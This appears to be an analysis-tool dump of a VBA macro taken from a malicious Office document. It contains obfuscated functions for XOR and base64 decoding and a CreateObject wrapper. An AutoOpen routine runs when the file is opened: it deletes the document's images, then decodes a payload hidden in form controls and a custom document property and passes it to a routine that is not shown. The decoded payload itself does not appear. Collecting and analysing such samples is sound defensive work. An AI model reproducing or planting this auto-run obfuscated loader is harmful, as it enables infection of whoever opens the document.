Filename     : ./macros/b49a04702d6892753bf952b49038f9eada0539f1c25f00d0c5ef9eeb9118cc54
OLE stream   : Macros/VBA/yVOrF5b
VBA filename : yVOrF5b.bas
----------------------------------------
Attribute VB_Name = "yVOrF5b"
Public Function jKXYyFXsP6t(ByRef dMceRXr As String, ByRef mmMXtO7wfd As String) As String
Dim MYSaIb3() As Byte
Dim nSViwa8ba4() As Byte
Dim XFXLwUN As Long
Dim UdDBUDXmV As Long
Dim sCoih8NISrV As Long
Dim KUYssEbC As Long
MYSaIb3 = StrConv(dMceRXr, vbFromUnicode)
nSViwa8ba4 = StrConv(mmMXtO7wfd, vbFromUnicode)
XFXLwUN = UBound(MYSaIb3)
UdDBUDXmV = UBound(nSViwa8ba4)
For sCoih8NISrV = 0 To XFXLwUN
MYSaIb3(sCoih8NISrV) = MYSaIb3(sCoih8NISrV) Xor nSViwa8ba4(KUYssEbC)
If KUYssEbC < UdDBUDXmV Then
KUYssEbC = KUYssEbC + 1
Else
KUYssEbC = 0
End If
Next sCoih8NISrV
jKXYyFXsP6t = StrConv(MYSaIb3, vbUnicode)
End Function
Public Function M7rU0xnlbL(KadhOCbRq As String, Optional THREE As Boolean = True) As String
Static dJjkeB87q(0 To 255) As Byte
Dim XjUQAzpV9x() As Byte, L6AzDM() As Byte
Dim YXo1Fg7Z As Long, rU8lxWTO As Long
If dJjkeB87q(0) = 0 Then
For YXo1Fg7Z = 0 To 255
dJjkeB87q(YXo1Fg7Z) = 255
Next YXo1Fg7Z
For YXo1Fg7Z = 0 To 25
dJjkeB87q(YXo1Fg7Z + 65) = YXo1Fg7Z
Next YXo1Fg7Z
For YXo1Fg7Z = 26 To 51
dJjkeB87q(YXo1Fg7Z + 71) = YXo1Fg7Z
Next YXo1Fg7Z
For YXo1Fg7Z = 52 To 61
dJjkeB87q(YXo1Fg7Z - 4) = YXo1Fg7Z
Next YXo1Fg7Z
dJjkeB87q(43) = 62
dJjkeB87q(47) = 63
End If
If KadhOCbRq = "" Then Exit Function
KadhOCbRq = Trim(KadhOCbRq)
If THREE Then
For YXo1Fg7Z = 0 To 255
If Not (Chr(YXo1Fg7Z) Like "[A-Za-z0-9+/=]") Then
KadhOCbRq = Replace(KadhOCbRq, Chr(YXo1Fg7Z), "")
End If
Next YXo1Fg7Z
End If
L6AzDM() = StrConv(KadhOCbRq, vbFromUnicode)
ReDim XjUQAzpV9x(0 To ((Len(KadhOCbRq) \ 4) * 3 - 1))
For YXo1Fg7Z = 0 To Len(KadhOCbRq) \ 4 - 2
rU8lxWTO = dJjkeB87q(L6AzDM(YXo1Fg7Z * 4 + 3))
rU8lxWTO = rU8lxWTO Or (dJjkeB87q(L6AzDM(YXo1Fg7Z * 4 + 2)) * &H40&)
rU8lxWTO = rU8lxWTO Or (dJjkeB87q(L6AzDM(YXo1Fg7Z * 4 + 1)) * &H1000&)
rU8lxWTO = rU8lxWTO Or (dJjkeB87q(L6AzDM(YXo1Fg7Z * 4 + 0)) * &H40000)
XjUQAzpV9x(YXo1Fg7Z * 3 + 0) = (rU8lxWTO And &HFF0000) \ &H10000
XjUQAzpV9x(YXo1Fg7Z * 3 + 1) = (rU8lxWTO And &HFF00&) \ &H100&
XjUQAzpV9x(YXo1Fg7Z * 3 + 2) = rU8lxWTO And &HFF&
Next YXo1Fg7Z
rU8lxWTO = 0
If dJjkeB87q(L6AzDM(YXo1Fg7Z * 4 + 3)) <> 255 Then rU8lxWTO = dJjkeB87q(L6AzDM(YXo1Fg7Z * 4 + 3))
If dJjkeB87q(L6AzDM(YXo1Fg7Z * 4 + 2)) <> 255 Then rU8lxWTO = rU8lxWTO Or (dJjkeB87q(L6AzDM(YXo1Fg7Z * 4 + 2)) * &H40&)
If dJjkeB87q(L6AzDM(YXo1Fg7Z * 4 + 1)) <> 255 Then rU8lxWTO = rU8lxWTO Or (dJjkeB87q(L6AzDM(YXo1Fg7Z * 4 + 1)) * &H1000&)
If dJjkeB87q(L6AzDM(YXo1Fg7Z * 4 + 0)) <> 255 Then rU8lxWTO = rU8lxWTO Or (dJjkeB87q(L6AzDM(YXo1Fg7Z * 4 + 0)) * &H40000)
XjUQAzpV9x(YXo1Fg7Z * 3 + 0) = (rU8lxWTO And &HFF0000) \ &H10000
XjUQAzpV9x(YXo1Fg7Z * 3 + 1) = (rU8lxWTO And &HFF00&) \ &H100&
XjUQAzpV9x(YXo1Fg7Z * 3 + 2) = rU8lxWTO And &HFF&
If L6AzDM(UBound(L6AzDM) - 1) = 61 Then
M7rU0xnlbL = Left(StrConv(XjUQAzpV9x, vbUnicode), UBound(XjUQAzpV9x) - 1)
ElseIf L6AzDM(UBound(L6AzDM)) = 61 Then
M7rU0xnlbL = Left(StrConv(XjUQAzpV9x, vbUnicode), UBound(XjUQAzpV9x) - 0)
Else
M7rU0xnlbL = StrConv(XjUQAzpV9x, vbUnicode)
End If
End Function
Sub RemovePicture()
Dim Tnps9eWY67WNvjY As InlineShape
For Each Tnps9eWY67WNvjY In ActiveDocument.InlineShapes
Tnps9eWY67WNvjY.Delete
Next Tnps9eWY67WNvjY
End Sub
Sub LoadText(ByRef Text As String)
ActiveDocument.Content.InsertAfter Text:=Text
End Sub

Public Function c45PAt(fT46XmU As String) As Object
Set c45PAt = CreateObject(fT46XmU)
End Function
Sub AutoOpen()
RemovePicture
LoadText (".") & Chr(11)
IGvOOlEq = jKXYyFXsP6t(M7rU0xnlbL(WJst59.AZeNBDCY), ActiveDocument.CustomDocumentProperties(WJst59.cVGOiinz3Ly9GHf.Caption).Value)
WJst59.OY9xIg (IGvOOlEq)
End Sub
